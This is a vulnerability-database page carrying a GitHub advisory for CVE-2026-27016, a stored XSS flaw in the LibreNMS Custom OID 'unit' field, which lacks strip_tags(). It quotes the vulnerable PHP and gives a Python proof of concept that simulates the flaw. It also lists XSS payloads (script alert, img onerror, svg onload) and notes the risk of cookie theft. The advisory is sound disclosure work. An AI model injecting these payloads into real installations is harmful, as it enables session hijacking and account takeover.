5.4

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2026-27016

CVE-2026-27016: LibreNMS has a Stored XSS in Custom OID - unit parameter missing strip_tags()

Summary

The unit parameter in Custom OID functionality lacks strip_tags() sanitization while other fields (name, oid, datatype) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping, allowing Stored XSS.

Details

Vulnerable Input Processing (includes/html/forms/customoid.inc.php lines 18-21):

$name = strip_tags((string) $_POST['name']);       // line 18 - SANITIZED
$oid = strip_tags((string) $_POST['oid']);         // line 19 - SANITIZED
$datatype = strip_tags((string) $_POST['datatype']);  // line 20 - SANITIZED
$unit = $_POST['unit'];                            // line 21 - NOT SANITIZED!

Vulnerable Output (graphs/customoid.inc.php lines 13-20):

$customoid_unit = $customoid['customoid_unit'];  // Retrieved from DB
$customoid_current = \LibreNMS\Util\Number::formatSi(...) . $customoid_unit;
echo "...$customoid_current...";  // ECHOED WITHOUT ESCAPING!

PoC

#!/usr/bin/env python3
"""
XSS test for LibreNMS Custom OID - unit parameter
"""

import html as html_module
import re

def strip_tags(value):
    return re.sub(r'<[^>]*?>', '', str(value))

# Simulate form processing (customoid.inc.php lines 18-21)
test_inputs = {
    'name': '<script>alert(1)</script>Test OID',
    'oid': '1.3.6.1.4.1.2021.10.1.3.1',
    'datatype': 'GAUGE',
    'unit': '<script>alert("XSS")</script>',
}

name = strip_tags(test_inputs['name'])      # Sanitized
oid = strip_tags(test_inputs['oid'])        # Sanitized
datatype = strip_tags(test_inputs['datatype'])  # Sanitized
unit = test_inputs['unit']                   # NOT SANITIZED!

print("Input Processing Analysis:")
print(f"  name (strip_tags):     {name}")
print(f"  oid (strip_tags):      {oid}")
print(f"  datatype (strip_tags): {datatype}")
print(f"  unit (NO strip_tags):  {unit}")
print()
print("*** VULNERABILITY: 'unit' parameter has NO strip_tags()! ***")

# Test XSS payloads
payloads = [
    '<script>alert("XSS")</script>',
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(1)>',
]

print("\nXSS Payload Tests:")
for payload in payloads:
    escaped = html_module.escape(payload)
    has_xss = '<script>' in payload or 'onerror=' in payload.lower()
    print(f"  Payload: {payload}")
    print(f"    Raw (vulnerable): Contains executable code: {has_xss}")
    print(f"    Escaped (safe):   {escaped}")

Expected Output

Input Processing Analysis:
  name (strip_tags):     alert(1)Test OID
  oid (strip_tags):      1.3.6.1.4.1.2021.10.1.3.1
  datatype (strip_tags): GAUGE
  unit (NO strip_tags):  <script>alert("XSS")</script>

*** VULNERABILITY: 'unit' parameter has NO strip_tags()! ***

Impact

Attack Vector: User with device edit permissions sets malicious Unit value
Exploitation: XSS payload stored in database, executes for all users viewing device graphs
Consequences:
- Session hijacking via cookie theft
- Admin account takeover
- Malicious actions on behalf of victims
- Persistent attack affecting all users
Affected Users: All LibreNMS installations with Custom OID feature

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2026-27016

CVE-2026-27016:

5.4

CVSS Score

3.1

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
librenms/librenms	composer	>= 24.10.0, < 26.2.0	26.2.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis:

In progress

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.